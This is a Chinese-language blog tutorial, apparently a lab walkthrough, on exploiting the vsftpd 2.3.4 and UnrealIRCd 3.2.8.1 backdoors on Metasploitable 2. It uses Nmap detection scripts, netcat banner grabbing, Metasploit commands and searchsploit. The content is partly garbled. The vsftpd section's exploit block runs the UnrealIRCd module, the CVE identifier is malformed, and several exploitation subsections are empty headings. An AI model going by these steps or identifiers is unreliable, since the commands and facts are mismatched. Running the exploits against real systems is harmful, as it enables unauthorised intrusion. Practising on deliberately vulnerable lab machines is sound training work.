- A+
一、VSFTPD v2.3.4 漏洞
当我们在谷歌上搜索关于 Vsftpd 2.3.4 的已知漏洞后我们可以得知该版本有一个已知后门漏洞。以下是该版本的下载地址:
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
这意味着 Vsftpd 2.3.4 及之前的版本都存在这个 backdoor 漏洞。因此这是值得一试的在 Metasploitable 2 上。在 Metasploit 中,也有关于这个后门漏洞的利用模块。
CVE: CVE-2011-02523
OSVDB: 73573
Nmap 脚本扫描 VSFTPD v2.3.4
我们可以启动 Metasploit 来得知,目标系统上运行的服务是否是存在漏洞的。还有另一种方法就是通过 Nmap 的 ftp-vsftpd-backdoor 脚本来进行扫描探测。下面我们来启动 Nmap 并用以下命令,对目标主机执行扫描:
1 |
nmap –script ftp-vsftpd-backdoor –p 21 [目标主机] |
从检测结果我们可以得知,目标使用的 vsFTPd 服务,为存在后门漏洞的版本。
关于Nmap的脚本和其他脚本参数的更多信息可以在这里找到:
https://nmap.org/nsedoc/scripts/ftp-vsftpd-backdoor.html
漏洞利用
1 2 3 4 5 6 7 |
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > show targets ...targets... msf exploit(unreal_ircd_3281_backdoor) > set TARGET < target-id > msf exploit(unreal_ircd_3281_backdoor) > show options ...show and set options... msf exploit(unreal_ircd_3281_backdoor) > exploit |
二、Unreal ircd 漏洞
Metasploitable 运行着 UnreaIRCD IRC 后台守护程序,在某个版本上存在一个自动向其他正在监听状态中的端口发送一个紧跟“AB”信件的系统命令的漏洞。下面,我们看看目标主机上的 Unreal ircd 服务。从 Nmap 的扫描结果看,它运行在 6667 端口上。但是我们还不知道它的具体版本号。这里我们可以使用一种通常的 banner 抓取技术。我们可以使用 Netcat 来抓取。命令如下:
1 |
nc [目标主机]6667 |
不幸的是 banner 信息并没有如愿返回给我们:
那么让我们回到 Nmap 使用 Nmap 对 6667 端口进行一次完整的扫描,命令如下:
1 |
nmap –A –p 6667 [目标主机] |
很幸运, Nmap 如我们所愿返回了 unreal ircd 服务相关的版本号,其版本为 unreal ircd 3.2.8.1 。当我们在谷歌上对该版本的 unreal ircd 进行查询后,我们可以得知,该版本存在一个后门漏洞。
https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor
在 Nmap 中同样有个脚本,可以用来检测该服务是否存在漏洞。命令如下:
1 |
nmap –sV –script irc-unrealircd-backdoor –p 6667 [目标主机] |
我们可以从输出结果得知,该版本是否为漏洞版本。由于脚本执行的命令无法返回到我们终端,因此我们无法百分百确定其是否存在漏洞。
漏洞利用
需要配置的参数
可用的payload
攻击
三、Kali Linux 下的 Searchsploit
在 kali 上其实也为我们默认集成了,一款专用于漏洞信息查询的工具 searchsploit 。使用命令如下:
1 |
searchsploit unreal ircd |
我们可以使用 cat 命令,来查看其内容:
1 |
cat /usr/share/exploitdb/platforms/linux/remote/16922.rb |
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-